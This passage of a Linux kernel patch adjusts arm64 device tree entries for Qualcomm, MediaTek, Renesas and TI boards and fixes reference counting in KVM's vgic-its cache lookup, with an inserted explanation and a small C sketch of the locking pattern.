+ 		interrupt-parent = <&gpiosb>;
+-		interrupts = <5 0>; /* GPIO2_5 */
++		interrupts = <5 IRQ_TYPE_EDGE_FALLING>; /* GPIO2_5 */
+ 	};
+ };
+ 
+diff --git a/arch/arm64/boot/dts/mediatek/mt8183.dtsi b/arch/arm64/boot/dts/mediatek/mt8183.dtsi
+index 10779a9947fe2..d5d9b954c449a 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8183.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8183.dtsi
+@@ -1586,7 +1586,7 @@
+ 			mediatek,gce-client-reg = <&gce SUBSYS_1400XXXX 0 0x1000>;
+ 		};
+ 
+-		mdp3-rdma0@14001000 {
++		dma-controller0@14001000 {
+ 			compatible = "mediatek,mt8183-mdp3-rdma";
+ 			reg = <0 0x14001000 0 0x1000>;
+ 			mediatek,gce-client-reg = <&gce SUBSYS_1400XXXX 0x1000 0x1000>;
+@@ -1598,6 +1598,7 @@
+ 			iommus = <&iommu M4U_PORT_MDP_RDMA0>;
+ 			mboxes = <&gce 20 CMDQ_THR_PRIO_LOWEST 0>,
+ 				 <&gce 21 CMDQ_THR_PRIO_LOWEST 0>;
++			#dma-cells = <1>;
+ 		};
+ 
+ 		mdp3-rsz0@14003000 {
+@@ -1618,7 +1619,7 @@
+ 			clocks = <&mmsys CLK_MM_MDP_RSZ1>;
+ 		};
+ 
+-		mdp3-wrot0@14005000 {
++		dma-controller@14005000 {
+ 			compatible = "mediatek,mt8183-mdp3-wrot";
+ 			reg = <0 0x14005000 0 0x1000>;
+ 			mediatek,gce-client-reg = <&gce SUBSYS_1400XXXX 0x5000 0x1000>;
+@@ -1627,6 +1628,7 @@
+ 			power-domains = <&spm MT8183_POWER_DOMAIN_DISP>;
+ 			clocks = <&mmsys CLK_MM_MDP_WROT0>;
+ 			iommus = <&iommu M4U_PORT_MDP_WROT0>;
++			#dma-cells = <1>;
+ 		};
+ 
+ 		mdp3-wdma@14006000 {
+diff --git a/arch/arm64/boot/dts/qcom/ipq6018.dtsi b/arch/arm64/boot/dts/qcom/ipq6018.dtsi
+index 43ff8f1f1475c..1533c61cb106c 100644
+--- a/arch/arm64/boot/dts/qcom/ipq6018.dtsi
++++ b/arch/arm64/boot/dts/qcom/ipq6018.dtsi
+@@ -146,7 +146,7 @@
+ 		ranges;
+ 
+ 		rpm_msg_ram: memory@60000 {
+-			reg = <0x0 0x60000 0x0 0x6000>;
++			reg = <0x0 0x00060000 0x0 0x6000>;
+ 			no-map;
+ 		};
+ 
+@@ -181,7 +181,7 @@
+ 
+ 		prng: qrng@e1000 {
+ 			compatible = "qcom,prng-ee";
+-			reg = <0x0 0xe3000 0x0 0x1000>;
++			reg = <0x0 0x000e3000 0x0 0x1000>;
+ 			clocks = <&gcc GCC_PRNG_AHB_CLK>;
+ 			clock-names = "core";
+ 		};
+@@ -201,8 +201,8 @@
+ 			compatible = "qcom,crypto-v5.1";
+ 			reg = <0x0 0x0073a000 0x0 0x6000>;
+ 			clocks = <&gcc GCC_CRYPTO_AHB_CLK>,
+-				<&gcc GCC_CRYPTO_AXI_CLK>,
+-				<&gcc GCC_CRYPTO_CLK>;
++				 <&gcc GCC_CRYPTO_AXI_CLK>,
++				 <&gcc GCC_CRYPTO_CLK>;
+ 			clock-names = "iface", "bus", "core";
+ 			dmas = <&cryptobam 2>, <&cryptobam 3>;
+ 			dma-names = "rx", "tx";
+@@ -272,7 +272,7 @@
+ 			reg = <0x0 0x078b1000 0x0 0x200>;
+ 			interrupts = <GIC_SPI 306 IRQ_TYPE_LEVEL_HIGH>;
+ 			clocks = <&gcc GCC_BLSP1_UART3_APPS_CLK>,
+-				<&gcc GCC_BLSP1_AHB_CLK>;
++				 <&gcc GCC_BLSP1_AHB_CLK>;
+ 			clock-names = "core", "iface";
+ 			status = "disabled";
+ 		};
+@@ -285,7 +285,7 @@
+ 			interrupts = <GIC_SPI 95 IRQ_TYPE_LEVEL_HIGH>;
+ 			spi-max-frequency = <50000000>;
+ 			clocks = <&gcc GCC_BLSP1_QUP1_SPI_APPS_CLK>,
+-				<&gcc GCC_BLSP1_AHB_CLK>;
++				 <&gcc GCC_BLSP1_AHB_CLK>;
+ 			clock-names = "core", "iface";
+ 			dmas = <&blsp_dma 12>, <&blsp_dma 13>;
+ 			dma-names = "tx", "rx";
+@@ -300,7 +300,7 @@
+ 			interrupts = <GIC_SPI 96 IRQ_TYPE_LEVEL_HIGH>;
+ 			spi-max-frequency = <50000000>;
+ 			clocks = <&gcc GCC_BLSP1_QUP2_SPI_APPS_CLK>,
+-				<&gcc GCC_BLSP1_AHB_CLK>;
++				 <&gcc GCC_BLSP1_AHB_CLK>;
+ 			clock-names = "core", "iface";
+ 			dmas = <&blsp_dma 14>, <&blsp_dma 15>;
+ 			dma-names = "tx", "rx";
+@@ -358,8 +358,8 @@
+ 			clock-names = "core", "aon";
+ 
+ 			dmas = <&qpic_bam 0>,
+-				<&qpic_bam 1>,
+-				<&qpic_bam 2>;
++			       <&qpic_bam 1>,
++			       <&qpic_bam 2>;
+ 			dma-names = "tx", "rx", "cmd";
+ 			pinctrl-0 = <&qpic_pins>;
+ 			pinctrl-names = "default";
+@@ -372,10 +372,10 @@
+ 			#size-cells = <2>;
+ 			interrupt-controller;
+ 			#interrupt-cells = <0x3>;
+-			reg =   <0x0 0x0b000000 0x0 0x1000>,  /*GICD*/
+-				<0x0 0x0b002000 0x0 0x1000>,  /*GICC*/
+-				<0x0 0x0b001000 0x0 0x1000>,  /*GICH*/
+-				<0x0 0x0b004000 0x0 0x1000>;  /*GICV*/
++			reg = <0x0 0x0b000000 0x0 0x1000>,  /*GICD*/
++			      <0x0 0x0b002000 0x0 0x1000>,  /*GICC*/
++			      <0x0 0x0b001000 0x0 0x1000>,  /*GICH*/
++			      <0x0 0x0b004000 0x0 0x1000>;  /*GICV*/
+ 			interrupts = <GIC_PPI 9 IRQ_TYPE_LEVEL_HIGH>;
+ 			ranges = <0 0 0 0xb00a000 0 0xffd>;
+ 
+@@ -388,7 +388,7 @@
+ 
+ 		pcie_phy: phy@84000 {
+ 			compatible = "qcom,ipq6018-qmp-pcie-phy";
+-			reg = <0x0 0x84000 0x0 0x1bc>; /* Serdes PLL */
++			reg = <0x0 0x00084000 0x0 0x1bc>; /* Serdes PLL */
+ 			status = "disabled";
+ 			#address-cells = <2>;
+ 			#size-cells = <2>;
+@@ -404,9 +404,10 @@
+ 				      "common";
+ 
+ 			pcie_phy0: phy@84200 {
+-				reg = <0x0 0x84200 0x0 0x16c>, /* Serdes Tx */
+-				      <0x0 0x84400 0x0 0x200>, /* Serdes Rx */
+-				      <0x0 0x84800 0x0 0x4f4>; /* PCS: Lane0, COM, PCIE */
++				reg = <0x0 0x00084200 0x0 0x16c>, /* Serdes Tx */
++				      <0x0 0x00084400 0x0 0x200>, /* Serdes Rx */
++				      <0x0 0x00084800 0x0 0x1f0>, /* PCS: Lane0, COM, PCIE */
++				      <0x0 0x00084c00 0x0 0xf4>; /* pcs_misc */
+ 				#phy-cells = <0>;
+ 
+ 				clocks = <&gcc GCC_PCIE0_PIPE_CLK>;
+@@ -628,7 +629,7 @@
+ 			#address-cells = <1>;
+ 			#size-cells = <0>;
+ 			compatible = "qcom,ipq6018-mdio", "qcom,ipq4019-mdio";
+-			reg = <0x0 0x90000 0x0 0x64>;
++			reg = <0x0 0x00090000 0x0 0x64>;
+ 			clocks = <&gcc GCC_MDIO_AHB_CLK>;
+ 			clock-names = "gcc_mdio_ahb_clk";
+ 			status = "disabled";
+@@ -636,7 +637,7 @@
+ 
+ 		qusb_phy_1: qusb@59000 {
+ 			compatible = "qcom,ipq6018-qusb2-phy";
+-			reg = <0x0 0x059000 0x0 0x180>;
++			reg = <0x0 0x00059000 0x0 0x180>;
+ 			#phy-cells = <0>;
+ 
+ 			clocks = <&gcc GCC_USB1_PHY_CFG_AHB_CLK>,
+@@ -668,23 +669,23 @@
+ 			status = "disabled";
+ 
+ 			dwc_1: usb@7000000 {
+-			       compatible = "snps,dwc3";
+-			       reg = <0x0 0x7000000 0x0 0xcd00>;
+-			       interrupts = <GIC_SPI 99 IRQ_TYPE_LEVEL_HIGH>;
+-			       phys = <&qusb_phy_1>;
+-			       phy-names = "usb2-phy";
+-			       tx-fifo-resize;
+-			       snps,is-utmi-l1-suspend;
+-			       snps,hird-threshold = /bits/ 8 <0x0>;
+-			       snps,dis_u2_susphy_quirk;
+-			       snps,dis_u3_susphy_quirk;
+-			       dr_mode = "host";
++				compatible = "snps,dwc3";
++				reg = <0x0 0x07000000 0x0 0xcd00>;
++				interrupts = <GIC_SPI 99 IRQ_TYPE_LEVEL_HIGH>;
++				phys = <&qusb_phy_1>;
++				phy-names = "usb2-phy";
++				tx-fifo-resize;
++				snps,is-utmi-l1-suspend;
++				snps,hird-threshold = /bits/ 8 <0x0>;
++				snps,dis_u2_susphy_quirk;
++				snps,dis_u3_susphy_quirk;
++				dr_mode = "host";
+ 			};
+ 		};
+ 
+ 		ssphy_0: ssphy@78000 {
+ 			compatible = "qcom,ipq6018-qmp-usb3-phy";
+-			reg = <0x0 0x78000 0x0 0x1C4>;
++			reg = <0x0 0x00078000 0x0 0x1c4>;
+ 			#address-cells = <2>;
+ 			#size-cells = <2>;
+ 			ranges;
+@@ -701,7 +702,7 @@
+ 			usb0_ssphy: phy@78200 {
+ 				reg = <0x0 0x00078200 0x0 0x130>, /* Tx */
+ 				      <0x0 0x00078400 0x0 0x200>, /* Rx */
+-				      <0x0 0x00078800 0x0 0x1F8>, /* PCS */
++				      <0x0 0x00078800 0x0 0x1f8>, /* PCS */
+ 				      <0x0 0x00078600 0x0 0x044>; /* PCS misc */
+ 				#phy-cells = <0>;
+ 				#clock-cells = <0>;
+@@ -713,7 +714,7 @@
+ 
+ 		qusb_phy_0: qusb@79000 {
+ 			compatible = "qcom,ipq6018-qusb2-phy";
+-			reg = <0x0 0x079000 0x0 0x180>;
++			reg = <0x0 0x00079000 0x0 0x180>;
+ 			#phy-cells = <0>;
+ 
+ 			clocks = <&gcc GCC_USB0_PHY_CFG_AHB_CLK>,
+@@ -726,7 +727,7 @@
+ 
+ 		usb3: usb@8af8800 {
+ 			compatible = "qcom,ipq6018-dwc3", "qcom,dwc3";
+-			reg = <0x0 0x8AF8800 0x0 0x400>;
++			reg = <0x0 0x8af8800 0x0 0x400>;
+ 			#address-cells = <2>;
+ 			#size-cells = <2>;
+ 			ranges;
+@@ -745,14 +746,14 @@
+ 					  <&gcc GCC_USB0_MOCK_UTMI_CLK>;
+ 			assigned-clock-rates = <133330000>,
+ 					       <133330000>,
+-					       <20000000>;
++					       <24000000>;
+ 
+ 			resets = <&gcc GCC_USB0_BCR>;
+ 			status = "disabled";
+ 
+ 			dwc_0: usb@8a00000 {
+ 				compatible = "snps,dwc3";
+-				reg = <0x0 0x8A00000 0x0 0xcd00>;
++				reg = <0x0 0x8a00000 0x0 0xcd00>;
+ 				interrupts = <GIC_SPI 140 IRQ_TYPE_LEVEL_HIGH>;
+ 				phys = <&qusb_phy_0>, <&usb0_ssphy>;
+ 				phy-names = "usb2-phy", "usb3-phy";
+diff --git a/arch/arm64/boot/dts/qcom/qrb5165-rb5.dts b/arch/arm64/boot/dts/qcom/qrb5165-rb5.dts
+index 9731a7c63d53b..1defbe0404e2e 100644
+--- a/arch/arm64/boot/dts/qcom/qrb5165-rb5.dts
++++ b/arch/arm64/boot/dts/qcom/qrb5165-rb5.dts
+@@ -63,8 +63,8 @@
+ 			function = LED_FUNCTION_INDICATOR;
+ 			color = <LED_COLOR_ID_GREEN>;
+ 			gpios = <&pm8150_gpios 10 GPIO_ACTIVE_HIGH>;
+-			linux,default-trigger = "panic-indicator";
+ 			default-state = "off";
++			panic-indicator;
+ 		};
+ 
+ 		led-wlan {
+diff --git a/arch/arm64/boot/dts/qcom/sc7180.dtsi b/arch/arm64/boot/dts/qcom/sc7180.dtsi
+index 6f0ee4e13ef1d..78e537f1d7965 100644
+--- a/arch/arm64/boot/dts/qcom/sc7180.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc7180.dtsi
+@@ -3378,7 +3378,7 @@
+ 			compatible = "qcom,apss-wdt-sc7180", "qcom,kpss-wdt";
+ 			reg = <0 0x17c10000 0 0x1000>;
+ 			clocks = <&sleep_clk>;
+-			interrupts = <GIC_SPI 0 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <GIC_SPI 0 IRQ_TYPE_EDGE_RISING>;
+ 		};
+ 
+ 		timer@17c20000{
+diff --git a/arch/arm64/boot/dts/qcom/sc7280-chrome-common.dtsi b/arch/arm64/boot/dts/qcom/sc7280-chrome-common.dtsi
+index 25f31c81b2b74..efe6ea538ad21 100644
+--- a/arch/arm64/boot/dts/qcom/sc7280-chrome-common.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc7280-chrome-common.dtsi
+@@ -56,6 +56,26 @@
+ 	};
+ };
+ 
++&lpass_aon {
++	status = "okay";
++};
++
++&lpass_core {
++	status = "okay";
++};
++
++&lpass_hm {
++	status = "okay";
++};
++
++&lpasscc {
++	status = "okay";
++};
++
++&pdc_reset {
++	status = "okay";
++};
++
+ /* The PMIC PON code isn't compatible w/ how Chrome EC/BIOS handle things. */
+ &pmk8350_pon {
+ 	status = "disabled";
+@@ -93,6 +113,10 @@
+ 	reg = <0x0 0x9c900000 0x0 0x800000>;
+ };
+ 
++&watchdog {
++	status = "okay";
++};
++
+ &wifi {
+ 	status = "okay";
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sc7280.dtsi b/arch/arm64/boot/dts/qcom/sc7280.dtsi
+index aea356c63b9a3..7fc8c20450223 100644
+--- a/arch/arm64/boot/dts/qcom/sc7280.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc7280.dtsi
+@@ -888,6 +888,7 @@
+ 
+ 			bus-width = <8>;
+ 			supports-cqe;
++			dma-coherent;
+ 
+ 			qcom,dll-config = <0x0007642c>;
+ 			qcom,ddr-config = <0x80040868>;
+@@ -2187,6 +2188,7 @@
+ 			clocks = <&gcc GCC_CFG_NOC_LPASS_CLK>;
+ 			clock-names = "iface";
+ 			#clock-cells = <1>;
++			status = "reserved"; /* Owned by ADSP firmware */
+ 		};
+ 
+ 		lpass_rx_macro: codec@3200000 {
+@@ -2339,6 +2341,7 @@
+ 			clock-names = "bi_tcxo", "bi_tcxo_ao", "iface";
+ 			#clock-cells = <1>;
+ 			#power-domain-cells = <1>;
++			status = "reserved"; /* Owned by ADSP firmware */
+ 		};
+ 
+ 		lpass_core: clock-controller@3900000 {
+@@ -2349,6 +2352,7 @@
+ 			power-domains = <&lpass_hm LPASS_CORE_CC_LPASS_CORE_HM_GDSC>;
+ 			#clock-cells = <1>;
+ 			#power-domain-cells = <1>;
++			status = "reserved"; /* Owned by ADSP firmware */
+ 		};
+ 
+ 		lpass_cpu: audio@3987000 {
+@@ -2419,6 +2423,7 @@
+ 			clock-names = "bi_tcxo";
+ 			#clock-cells = <1>;
+ 			#power-domain-cells = <1>;
++			status = "reserved"; /* Owned by ADSP firmware */
+ 		};
+ 
+ 		lpass_ag_noc: interconnect@3c40000 {
+@@ -2529,7 +2534,8 @@
+ 				    "cx_mem",
+ 				    "cx_dbgc";
+ 			interrupts = <GIC_SPI 300 IRQ_TYPE_LEVEL_HIGH>;
+-			iommus = <&adreno_smmu 0 0x401>;
++			iommus = <&adreno_smmu 0 0x400>,
++				 <&adreno_smmu 1 0x400>;
+ 			operating-points-v2 = <&gpu_opp_table>;
+ 			qcom,gmu = <&gmu>;
+ 			interconnects = <&gem_noc MASTER_GFX3D 0 &mc_virt SLAVE_EBI1 0>;
+@@ -2696,6 +2702,7 @@
+ 					"gpu_cc_hub_aon_clk";
+ 
+ 			power-domains = <&gpucc GPU_CC_CX_GDSC>;
++			dma-coherent;
+ 		};
+ 
+ 		remoteproc_mpss: remoteproc@4080000 {
+@@ -3265,6 +3272,7 @@
+ 			operating-points-v2 = <&sdhc2_opp_table>;
+ 
+ 			bus-width = <4>;
++			dma-coherent;
+ 
+ 			qcom,dll-config = <0x0007642c>;
+ 
+@@ -3386,8 +3394,8 @@
+ 			assigned-clock-rates = <19200000>, <200000000>;
+ 
+ 			interrupts-extended = <&intc GIC_SPI 240 IRQ_TYPE_LEVEL_HIGH>,
+-					      <&pdc 12 IRQ_TYPE_EDGE_RISING>,
+-					      <&pdc 13 IRQ_TYPE_EDGE_RISING>;
++					      <&pdc 12 IRQ_TYPE_EDGE_BOTH>,
++					      <&pdc 13 IRQ_TYPE_EDGE_BOTH>;
+ 			interrupt-names = "hs_phy_irq",
+ 					  "dp_hs_phy_irq",
+ 					  "dm_hs_phy_irq";
+@@ -4195,6 +4203,7 @@
+ 			compatible = "qcom,sc7280-pdc-global";
+ 			reg = <0 0x0b5e0000 0 0x20000>;
+ 			#reset-cells = <1>;
++			status = "reserved"; /* Owned by firmware */
+ 		};
+ 
+ 		tsens0: thermal-sensor@c263000 {
+@@ -5186,11 +5195,12 @@
+ 			};
+ 		};
+ 
+-		watchdog@17c10000 {
++		watchdog: watchdog@17c10000 {
+ 			compatible = "qcom,apss-wdt-sc7280", "qcom,kpss-wdt";
+ 			reg = <0 0x17c10000 0 0x1000>;
+ 			clocks = <&sleep_clk>;
+-			interrupts = <GIC_SPI 0 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <GIC_SPI 0 IRQ_TYPE_EDGE_RISING>;
++			status = "reserved"; /* Owned by Gunyah hyp */
+ 		};
+ 
+ 		timer@17c20000 {
+diff --git a/arch/arm64/boot/dts/qcom/sc8280xp.dtsi b/arch/arm64/boot/dts/qcom/sc8280xp.dtsi
+index 405835ad28bcd..7e3aaf5de3f5c 100644
+--- a/arch/arm64/boot/dts/qcom/sc8280xp.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc8280xp.dtsi
+@@ -1653,7 +1653,7 @@
+ 			compatible = "qcom,apss-wdt-sc8280xp", "qcom,kpss-wdt";
+ 			reg = <0 0x17c10000 0 0x1000>;
+ 			clocks = <&sleep_clk>;
+-			interrupts = <GIC_SPI 0 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <GIC_SPI 0 IRQ_TYPE_EDGE_RISING>;
+ 		};
+ 
+ 		timer@17c20000 {
+diff --git a/arch/arm64/boot/dts/qcom/sdm845-db845c.dts b/arch/arm64/boot/dts/qcom/sdm845-db845c.dts
+index 8c9ccf5b4ea41..135ff4368c4a6 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845-db845c.dts
++++ b/arch/arm64/boot/dts/qcom/sdm845-db845c.dts
+@@ -66,8 +66,8 @@
+ 			function = LED_FUNCTION_INDICATOR;
+ 			color = <LED_COLOR_ID_GREEN>;
+ 			gpios = <&pm8998_gpio 13 GPIO_ACTIVE_HIGH>;
+-			linux,default-trigger = "panic-indicator";
+ 			default-state = "off";
++			panic-indicator;
+ 		};
+ 
+ 		led-1 {
+diff --git a/arch/arm64/boot/dts/qcom/sdm845.dtsi b/arch/arm64/boot/dts/qcom/sdm845.dtsi
+index 52c9f5639f8a2..1e6841902900c 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845.dtsi
++++ b/arch/arm64/boot/dts/qcom/sdm845.dtsi
+@@ -5019,7 +5019,7 @@
+ 			compatible = "qcom,apss-wdt-sdm845", "qcom,kpss-wdt";
+ 			reg = <0 0x17980000 0 0x1000>;
+ 			clocks = <&sleep_clk>;
+-			interrupts = <GIC_SPI 0 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <GIC_SPI 0 IRQ_TYPE_EDGE_RISING>;
+ 		};
+ 
+ 		apss_shared: mailbox@17990000 {
+diff --git a/arch/arm64/boot/dts/qcom/sm6350.dtsi b/arch/arm64/boot/dts/qcom/sm6350.dtsi
+index cea7ca3f326fc..9da373090593c 100644
+--- a/arch/arm64/boot/dts/qcom/sm6350.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm6350.dtsi
+@@ -1462,7 +1462,7 @@
+ 			compatible = "qcom,apss-wdt-sm6350", "qcom,kpss-wdt";
+ 			reg = <0 0x17c10000 0 0x1000>;
+ 			clocks = <&sleep_clk>;
+-			interrupts = <GIC_SPI 0 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <GIC_SPI 0 IRQ_TYPE_EDGE_RISING>;
+ 		};
+ 
+ 		timer@17c20000 {
+diff --git a/arch/arm64/boot/dts/qcom/sm8150-hdk.dts b/arch/arm64/boot/dts/qcom/sm8150-hdk.dts
+index 3331ee957d648..368da4c7f41be 100644
+--- a/arch/arm64/boot/dts/qcom/sm8150-hdk.dts
++++ b/arch/arm64/boot/dts/qcom/sm8150-hdk.dts
+@@ -126,8 +126,6 @@
+ 		vdda_sp_sensor:
+ 		vdda_ufs_2ln_core_1:
+ 		vdda_ufs_2ln_core_2:
+-		vdda_usb_ss_dp_core_1:
+-		vdda_usb_ss_dp_core_2:
+ 		vdda_qlink_lv:
+ 		vdda_qlink_lv_ck:
+ 		vreg_l5a_0p875: ldo5 {
+@@ -209,6 +207,12 @@
+ 			regulator-max-microvolt = <3008000>;
+ 			regulator-initial-mode = <RPMH_REGULATOR_MODE_HPM>;
+ 		};
++
++		vreg_l18a_0p8: ldo18 {
++			regulator-min-microvolt = <880000>;
++			regulator-max-microvolt = <880000>;
++			regulator-initial-mode = <RPMH_REGULATOR_MODE_HPM>;
++		};
+ 	};
+ 
+ 	pm8150l-rpmh-regulators {
+@@ -439,13 +443,13 @@
+ &usb_1_qmpphy {
+ 	status = "okay";
+ 	vdda-phy-supply = <&vreg_l3c_1p2>;
+-	vdda-pll-supply = <&vdda_usb_ss_dp_core_1>;
++	vdda-pll-supply = <&vreg_l18a_0p8>;
+ };
+ 
+ &usb_2_qmpphy {
+ 	status = "okay";
+ 	vdda-phy-supply = <&vreg_l3c_1p2>;
+-	vdda-pll-supply = <&vdda_usb_ss_dp_core_1>;
++	vdda-pll-supply = <&vreg_l5a_0p875>;
+ };
+ 
+ &usb_1 {
+diff --git a/arch/arm64/boot/dts/qcom/sm8150.dtsi b/arch/arm64/boot/dts/qcom/sm8150.dtsi
+index c586378fc6bc7..c3c12b0cd4168 100644
+--- a/arch/arm64/boot/dts/qcom/sm8150.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8150.dtsi
+@@ -3940,7 +3940,7 @@
+ 			compatible = "qcom,apss-wdt-sm8150", "qcom,kpss-wdt";
+ 			reg = <0 0x17c10000 0 0x1000>;
+ 			clocks = <&sleep_clk>;
+-			interrupts = <GIC_SPI 0 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <GIC_SPI 0 IRQ_TYPE_EDGE_RISING>;
+ 		};
+ 
+ 		timer@17c20000 {
+diff --git a/arch/arm64/boot/dts/qcom/sm8250.dtsi b/arch/arm64/boot/dts/qcom/sm8250.dtsi
+index 4d9b30f0b2841..3d02adbc0b62f 100644
+--- a/arch/arm64/boot/dts/qcom/sm8250.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8250.dtsi
+@@ -4879,7 +4879,7 @@
+ 			compatible = "qcom,apss-wdt-sm8250", "qcom,kpss-wdt";
+ 			reg = <0 0x17c10000 0 0x1000>;
+ 			clocks = <&sleep_clk>;
+-			interrupts = <GIC_SPI 0 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <GIC_SPI 0 IRQ_TYPE_EDGE_RISING>;
+ 		};
+ 
+ 		timer@17c20000 {
+diff --git a/arch/arm64/boot/dts/qcom/sm8350.dtsi b/arch/arm64/boot/dts/qcom/sm8350.dtsi
+index 793768a2c9e1e..888bf4cd73c31 100644
+--- a/arch/arm64/boot/dts/qcom/sm8350.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8350.dtsi
+@@ -903,9 +903,9 @@
+ 			};
+ 		};
+ 
+-		gpi_dma0: dma-controller@9800000 {
++		gpi_dma0: dma-controller@900000 {
+ 			compatible = "qcom,sm8350-gpi-dma", "qcom,sm6350-gpi-dma";
+-			reg = <0 0x09800000 0 0x60000>;
++			reg = <0 0x00900000 0 0x60000>;
+ 			interrupts = <GIC_SPI 244 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 245 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 246 IRQ_TYPE_LEVEL_HIGH>,
+diff --git a/arch/arm64/boot/dts/renesas/r8a779g0-white-hawk-cpu.dtsi b/arch/arm64/boot/dts/renesas/r8a779g0-white-hawk-cpu.dtsi
+index 895f0bd9f7540..541b1e73b65e0 100644
+--- a/arch/arm64/boot/dts/renesas/r8a779g0-white-hawk-cpu.dtsi
++++ b/arch/arm64/boot/dts/renesas/r8a779g0-white-hawk-cpu.dtsi
+@@ -125,6 +125,9 @@
+ };
+ 
+ &hscif0 {
++	pinctrl-0 = <&hscif0_pins>;
++	pinctrl-names = "default";
++
+ 	status = "okay";
+ };
+ 
+diff --git a/arch/arm64/boot/dts/ti/k3-am62a-main.dtsi b/arch/arm64/boot/dts/ti/k3-am62a-main.dtsi
+index bc4b50bcd1773..9301ea3888021 100644
+--- a/arch/arm64/boot/dts/ti/k3-am62a-main.dtsi
++++ b/arch/arm64/boot/dts/ti/k3-am62a-main.dtsi
+@@ -245,7 +245,7 @@
+ 			     <193>, <194>, <195>;
+ 		interrupt-controller;
+ 		#interrupt-cells = <2>;
+-		ti,ngpio = <87>;
++		ti,ngpio = <92>;
+ 		ti,davinci-gpio-unbanked = <0>;
+ 		power-domains = <&k3_pds 77 TI_SCI_PD_EXCLUSIVE>;
+ 		clocks = <&k3_clks 77 0>;
+@@ -263,7 +263,7 @@
+ 			     <183>, <184>, <185>;
+ 		interrupt-controller;
+ 		#interrupt-cells = <2>;
+-		ti,ngpio = <88>;
++		ti,ngpio = <52>;
+ 		ti,davinci-gpio-unbanked = <0>;
+ 		power-domains = <&k3_pds 78 TI_SCI_PD_EXCLUSIVE>;
+ 		clocks = <&k3_clks 78 0>;
+diff --git a/arch/arm64/boot/dts/ti/k3-am65-main.dtsi b/arch/arm64/boot/dts/ti/k3-am65-main.dtsi
+index ebb1c5ce7aece..83dd8993027ab 100644
+--- a/arch/arm64/boot/dts/ti/k3-am65-main.dtsi
++++ b/arch/arm64/boot/dts/ti/k3-am65-main.dtsi
+@@ -856,7 +856,7 @@
+ 		assigned-clocks = <&k3_clks 67 2>;
+ 		assigned-clock-parents = <&k3_clks 67 5>;
+ 
+-		interrupts = <GIC_SPI 166 IRQ_TYPE_EDGE_RISING>;
++		interrupts = <GIC_SPI 166 IRQ_TYPE_LEVEL_HIGH>;
+ 
+ 		dma-coherent;
+ 
+diff --git a/arch/arm64/kvm/vgic/vgic-its.c b/arch/arm64/kvm/vgic/vgic-its.c
+index 00ad6587bee9a..3c344e4cd4cad 100644
+--- a/arch/arm64/kvm/vgic/vgic-its.c
++++ b/arch/arm64/kvm/vgic/vgic-its.c
+@@ -584,7 +584,11 @@ static struct vgic_irq *vgic_its_check_cache(struct kvm *kvm, phys_addr_t db,
+ 	unsigned long flags;
+ 
+ 	raw_spin_lock_irqsave(&dist->lpi_list_lock, flags);
++
+ 	irq = __vgic_its_check_cache(dist, db, devid, eventid);
++	if (irq)
++		vgic_get_irq_kref(irq);
++
+ 	raw_spin_unlock_irqrestore(&dist->lpi_list_lock, flags);
+ 
+ 	return irq;
+@@ -763,6 +767,7 @@ int vgic_its_inject_cached_translation(struct kvm *kvm, struct kvm_msi *msi)
+ 	raw_spin_lock_irqsave(&irq->irq_lock, flags);
+ 	irq->pending_latch = true;
+ 	vgic_queue_irq_unlock(kvm, irq, flags);
++	vgic_put_irq(kvm, irq);
+ 
+ 	return 0;
+ }
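
The two hunks above pair a reference grab with a later put: the translation-cache lookup now takes a reference on the IRQ while lpi_list_lock is still held, and vgic_its_inject_cached_translation() drops it once the interrupt is queued, so the IRQ cannot be freed between the cache hit and its use. Below is a minimal userspace sketch of the same lookup-with-reference pattern; every name in it is illustrative, not a kernel API:

    #include <pthread.h>
    #include <stdatomic.h>
    #include <stdlib.h>

    struct obj {
    	atomic_int ref;
    	int key;
    	struct obj *next;
    };

    static pthread_mutex_t cache_lock = PTHREAD_MUTEX_INITIALIZER;
    static struct obj *cache;

    /* Grab the reference while the lock still pins the object in the
     * cache; returning a bare pointer would let another thread free
     * it between the lookup and the caller's use. */
    static struct obj *lookup_get(int key)
    {
    	struct obj *o;

    	pthread_mutex_lock(&cache_lock);
    	for (o = cache; o; o = o->next)
    		if (o->key == key) {
    			atomic_fetch_add(&o->ref, 1);
    			break;
    		}
    	pthread_mutex_unlock(&cache_lock);
    	return o;	/* caller must call put() when done */
    }

    static void put(struct obj *o)
    {
    	if (o && atomic_fetch_sub(&o->ref, 1) == 1)
    		free(o);	/* last reference dropped */
    }
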
+diff --git a/arch/arm64/kvm/vgic/vgic-mmio-v3.c b/arch/arm64/kvm/vgic/vgic-mmio-v3.c
+index 871a45d4fc84c..ae5a3a717655e 100644
+--- a/arch/arm64/kvm/vgic/vgic-mmio-v3.c
++++ b/arch/arm64/kvm/vgic/vgic-mmio-v3.c
+@@ -365,19 +365,26 @@ static int vgic_v3_uaccess_write_pending(struct kvm_vcpu *vcpu,
+ 		struct vgic_irq *irq = vgic_get_irq(vcpu->kvm, vcpu, intid + i);
+ 
+ 		raw_spin_lock_irqsave(&irq->irq_lock, flags);
+-		if (test_bit(i, &val)) {
+-			/*
+-			 * pending_latch is set irrespective of irq type
+-			 * (level or edge) to avoid dependency that VM should
+-			 * restore irq config before pending info.
+-			 */
+-			irq->pending_latch = true;
+-			vgic_queue_irq_unlock(vcpu->kvm, irq, flags);
+-		} else {
++
++		/*
++		 * pending_latch is set irrespective of irq type
++		 * (level or edge) to avoid dependency that VM should
++		 * restore irq config before pending info.
++		 */
